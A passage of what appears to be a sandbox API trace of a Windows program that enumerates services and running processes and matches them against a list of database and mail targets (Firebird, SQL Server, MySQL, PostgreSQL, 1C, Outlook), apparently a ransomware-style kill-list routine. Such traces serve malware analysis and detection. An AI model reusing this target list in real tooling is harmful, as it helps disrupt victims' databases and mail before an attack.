(lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0268.105] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0268.105] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0268.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0268.105] lstrlenW (lpString="Dhcp") returned 4 [0268.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0268.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0268.105] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0268.105] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0268.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0268.105] lstrlenW (lpString="Dnscache") returned 8 [0268.105] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0268.105] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0268.105] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0268.105] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0268.105] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0268.106] lstrlenW (lpString="DPS") returned 3 [0268.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0268.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0268.106] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0268.106] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0268.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0268.106] lstrlenW (lpString="eventlog") returned 8 [0268.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0268.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0268.106] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0268.106] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0268.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0268.106] lstrlenW (lpString="EventSystem") returned 11 [0268.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0268.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0268.106] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0268.106] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0268.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0268.106] lstrlenW (lpString="gpsvc") returned 5 [0268.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0268.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0268.106] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0268.106] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0268.106] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0268.106] lstrlenW (lpString="LanmanWorkstation") returned 17 [0268.106] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0268.106] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0268.106] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0268.107] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0268.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0268.107] lstrlenW (lpString="lmhosts") returned 7 [0268.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0268.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0268.107] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0268.107] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0268.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0268.107] lstrlenW (lpString="MMCSS") returned 5 [0268.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0268.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0268.107] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0268.107] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0268.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0268.107] lstrlenW (lpString="MpsSvc") returned 6 [0268.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0268.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0268.107] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0268.107] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0268.107] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0268.107] lstrlenW (lpString="NlaSvc") returned 6 [0268.107] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0268.107] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0268.107] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0268.107] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0268.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0268.108] lstrlenW (lpString="nsi") returned 3 [0268.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0268.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0268.108] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0268.108] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0268.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0268.108] lstrlenW (lpString="PcaSvc") returned 6 [0268.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0268.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0268.108] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0268.108] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0268.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0268.108] lstrlenW (lpString="PlugPlay") returned 8 [0268.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0268.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0268.108] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0268.108] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0268.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0268.108] lstrlenW (lpString="Power") returned 5 [0268.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0268.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0268.108] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0268.108] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0268.108] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0268.108] lstrlenW (lpString="ProfSvc") returned 7 [0268.108] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0268.108] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0268.108] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0268.108] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0268.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0268.109] lstrlenW (lpString="RpcEptMapper") returned 12 [0268.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0268.109] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0268.109] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0268.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0268.109] lstrlenW (lpString="RpcSs") returned 5 [0268.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0268.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0268.109] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0268.109] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0268.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0268.109] lstrlenW (lpString="SamSs") returned 5 [0268.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0268.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0268.109] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0268.109] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0268.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0268.109] lstrlenW (lpString="Schedule") returned 8 [0268.109] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0268.109] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0268.109] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0268.109] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0268.109] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0268.110] lstrlenW (lpString="SENS") returned 4 [0268.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0268.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0268.110] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0268.110] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0268.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0268.110] lstrlenW (lpString="ShellHWDetection") returned 16 [0268.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0268.110] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0268.110] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0268.110] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0268.110] lstrlenW (lpString="Spooler") returned 7 [0268.110] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0268.110] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0268.110] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0268.110] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0268.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0268.111] lstrlenW (lpString="Themes") returned 6 [0268.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0268.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0268.111] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0268.111] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0268.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0268.111] lstrlenW (lpString="UxSms") returned 5 [0268.111] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0268.111] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0268.111] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0268.111] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0268.111] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0268.111] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x43acc98 | out: hHeap=0x520000) returned 1 [0268.111] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2ac [0268.112] Process32FirstW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0268.112] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4d, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0268.112] lstrlenW (lpString="System") returned 6 [0268.112] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0268.113] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0268.113] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0268.113] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0268.113] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0268.113] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0268.113] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0268.113] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0268.113] lstrlenW (lpString="smss.exe") returned 8 [0268.113] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0268.113] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0268.113] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0268.113] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0268.113] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0268.113] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0268.113] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0268.113] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.113] lstrlenW (lpString="csrss.exe") returned 9 [0268.114] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.114] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.114] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.114] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.114] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.114] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.114] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.114] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0268.114] lstrlenW (lpString="wininit.exe") returned 11 [0268.114] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1 [0268.114] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1 [0268.114] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1 [0268.114] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1 [0268.114] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1 [0268.114] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1 [0268.114] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1 [0268.114] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0268.115] lstrlenW (lpString="csrss.exe") returned 9 [0268.115] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0268.115] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0268.115] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0268.115] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0268.115] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1 [0268.115] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1 [0268.115] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1 [0268.115] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0268.115] lstrlenW (lpString="winlogon.exe") returned 12 [0268.115] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1 [0268.115] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1 [0268.115] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1 [0268.115] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1 [0268.115] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1 [0268.115] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1 [0268.115] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1 [0268.115] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0268.116] lstrlenW (lpString="services.exe") returned 12 [0268.116] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0268.116] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0268.116] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0268.116] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0268.116] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0268.116] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0268.116] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0268.116] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0268.116] lstrlenW (lpString="lsass.exe") returned 9 [0268.116] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0268.116] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0268.116] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0268.116] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0268.116] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0268.116] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0268.116] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0268.116] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0268.117] lstrlenW (lpString="lsm.exe") returned 7 [0268.117] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0268.117] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0268.117] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0268.117] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0268.117] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0268.117] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0268.117] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0268.117] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.117] lstrlenW (lpString="svchost.exe") returned 11 [0268.117] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.117] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.117] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.117] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.117] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.117] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.117] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.117] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.118] lstrlenW (lpString="svchost.exe") returned 11 [0268.118] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.118] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.118] lstrlenW (lpString="svchost.exe") returned 11 [0268.118] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.118] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.119] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.119] lstrlenW (lpString="svchost.exe") returned 11 [0268.119] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.119] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.119] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.119] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0268.119] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0268.119] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0268.119] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0268.119] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.119] lstrlenW (lpString="svchost.exe") returned 11 [0268.119] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0268.119] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0268.120] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0268.120] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0268.120] lstrlenW (lpString="audiodg.exe") returned 11 [0268.120] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.120] lstrlenW (lpString="svchost.exe") returned 11 [0268.121] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0268.121] lstrlenW (lpString="svchost.exe") returned 11 [0268.121] Process32NextW (in: hSnapshot=0x2ac, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, 